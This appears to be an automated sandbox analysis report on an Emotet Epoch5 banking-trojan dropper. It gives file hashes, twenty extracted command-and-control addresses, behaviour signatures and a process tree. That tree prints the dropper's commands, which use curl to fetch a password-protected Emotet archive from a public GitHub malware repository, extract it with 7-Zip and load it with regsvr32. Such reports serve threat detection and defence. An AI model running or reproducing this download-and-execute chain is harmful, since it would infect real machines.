emotet | d93cfa3cdbae1d62f1b55b7a0b60b547834cc144af1fc28b8afd69f9065f7f02

General

Target

UltraDropper.exe
Size

57KB
MD5

354274b178062ef85722f8204629e78d
SHA1

616229aa8f5169938a9f5b872cc03a60209fa46b
SHA256

d93cfa3cdbae1d62f1b55b7a0b60b547834cc144af1fc28b8afd69f9065f7f02
SHA512

afb96510a0c38a9e4eb74040adc504dc3ff46b4845ea60b2271296e28f530e0d8cf7df3d6c2b5d47fc9c0334792c6621b8b48ec06cfe66701353d357d7a5a53f
SSDEEP

768:/t+et7EWvq3fuXjUp2+1pMh4d/J/rflOeTqOW7xQ8VORH:ztGfuLc/J/blOtr7xQ8Vs

Score

10^/10

emotet epoch5 banker trojan

Malware Config

Extracted

Family

emotet

Botnet

Epoch5

C2

178.238.225.252:8080

139.196.72.155:8080

36.67.23.59:443

103.56.149.105:8080

37.44.244.177:8080

85.25.120.45:8080

202.134.4.210:7080

78.47.204.80:443

83.229.80.93:8080

93.104.209.107:8080

80.211.107.116:8080

165.22.254.236:8080

104.244.79.94:443

185.148.169.10:8080

190.145.8.4:443

175.126.176.79:8080

139.59.80.108:8080

188.165.79.151:443

128.199.217.206:443

64.227.55.231:8080

ecs1.plain

eck1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Loads dropped DLL 2 IoCs

Processes:

regsvr32.exeregsvr32.exe

pid process

3672 regsvr32.exe
4628 regsvr32.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

82 raw.githubusercontent.com
83 raw.githubusercontent.com
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

regsvr32.exeregsvr32.exe

pid process

3672 regsvr32.exe
3672 regsvr32.exe
4628 regsvr32.exe
4628 regsvr32.exe
4628 regsvr32.exe
4628 regsvr32.exe

pid	process
3672	regsvr32.exe
4628	regsvr32.exe

flow	ioc
82	raw.githubusercontent.com
83	raw.githubusercontent.com

pid	process
3672	regsvr32.exe
3672	regsvr32.exe
4628	regsvr32.exe
4628	regsvr32.exe
4628	regsvr32.exe
4628	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

7z.exe7zG.exe

description	pid	process
Token: SeRestorePrivilege	2700	7z.exe
Token: 35	2700	7z.exe
Token: SeSecurityPrivilege	2700	7z.exe
Token: SeSecurityPrivilege	2700	7z.exe
Token: SeRestorePrivilege	404	7zG.exe
Token: 35	404	7zG.exe
Token: SeSecurityPrivilege	404	7zG.exe
Token: SeSecurityPrivilege	404	7zG.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

7zG.exe

pid process

404 7zG.exe

pid	process
404	7zG.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

UltraDropper.execmd.execmd.execmd.exeregsvr32.exe

description	pid	process	target process
PID 3380 wrote to memory of 3656	3380	UltraDropper.exe	cmd.exe
PID 3380 wrote to memory of 3656	3380	UltraDropper.exe	cmd.exe
PID 3380 wrote to memory of 3656	3380	UltraDropper.exe	cmd.exe
PID 3656 wrote to memory of 3464	3656	cmd.exe	curl.exe
PID 3656 wrote to memory of 3464	3656	cmd.exe	curl.exe
PID 3656 wrote to memory of 3464	3656	cmd.exe	curl.exe
PID 3656 wrote to memory of 2700	3656	cmd.exe	7z.exe
PID 3656 wrote to memory of 2700	3656	cmd.exe	7z.exe
PID 4008 wrote to memory of 2396	4008	cmd.exe	curl.exe
PID 4008 wrote to memory of 2396	4008	cmd.exe	curl.exe
PID 1688 wrote to memory of 3672	1688	cmd.exe	regsvr32.exe
PID 1688 wrote to memory of 3672	1688	cmd.exe	regsvr32.exe
PID 3672 wrote to memory of 4628	3672	regsvr32.exe	regsvr32.exe
PID 3672 wrote to memory of 4628	3672	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe
"C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3380

C:\Windows\SysWOW64\cmd.exe
cmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet(Epoch5)-.2022 10483280p" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"
2⤵
- Suspicious use of WriteProcessMemory
PID:3656

C:\Windows\SysWOW64\curl.exe
curl -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet(Epoch5)-.2022 10483280p"
3⤵
PID:3464

C:\Program Files\7-Zip\7z.exe
"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4008

C:\Windows\system32\curl.exe
curl -L -o "Emotet-Epoch5.zip" https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip
2⤵
PID:2396

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5\" -spe -an -ai#7zMap9460:106:7zEvent2310
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\system32\regsvr32.exe
regsvr32 emotet.dll
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3672

C:\Windows\system32\regsvr32.exe
C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QHAJNsT\yVWoZrzUSiIo.dll"
3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip
Filesize
90B

MD5
01f4771c47a56dbdf77642c80eb9b799

SHA1
6aead125925ec84c9171e3b29b9c2fc00682bda5

SHA256
eec0a51a966b712aaccd11df320373becc55f174b97030419f9fae79f0cf542c

SHA512
8f4e2f726b5dd362d40e4576d53c426b262c3bbc48387f4d9ca18e4e70a78f77a1ffb007cb498b31523ca1278dd61a6c33fee636b732915a27f27248639e2162

Download Submit
C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip
Filesize
289KB

MD5
ebe6bc9eab807cdd910976a341bc070d

SHA1
1052700b1945bb1754f3cadad669fc4a99f5607b

SHA256
b0353f4547466a0a402198b3750d928fc7c4e96dd3adc00b181e9d98e4602ea7

SHA512
9a6bfcb90c1e24be1b930990dd2af72e889f71ad7e1a7b8353b6522a625e2ae36013793ee2c159880bd510b8f785ce4c9dfced1d2901d3ca8f091e26084185a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5\emotet.dll
Filesize
534KB

MD5
56bb8500d7ab6860760eddd7a55e9456

SHA1
e9b38c5fb51ce1a038f65c1620115a9bba1e383d

SHA256
b4bead39ead2a29de2f0a6fb52eea172cfe25224b71e4a9b1418f55c8b053d59

SHA512
83ceff476d071412b02bab0753bd3c4440937b663397d73349fa90c38d96cf88051b645c781cbe5de281aa3bd45e71da7fcc8c99c2846ce29c2f36c3e1307a84

Download Submit
memory/3380-0-0x0000000000410000-0x0000000000422000-memory.dmp

Filesize
72KB

Download
memory/3672-9-0x0000000002A00000-0x0000000002A30000-memory.dmp

Filesize
192KB

Download
memory/3672-13-0x0000000180000000-0x000000018008C000-memory.dmp

Filesize
560KB

Download

Analysis

Sharing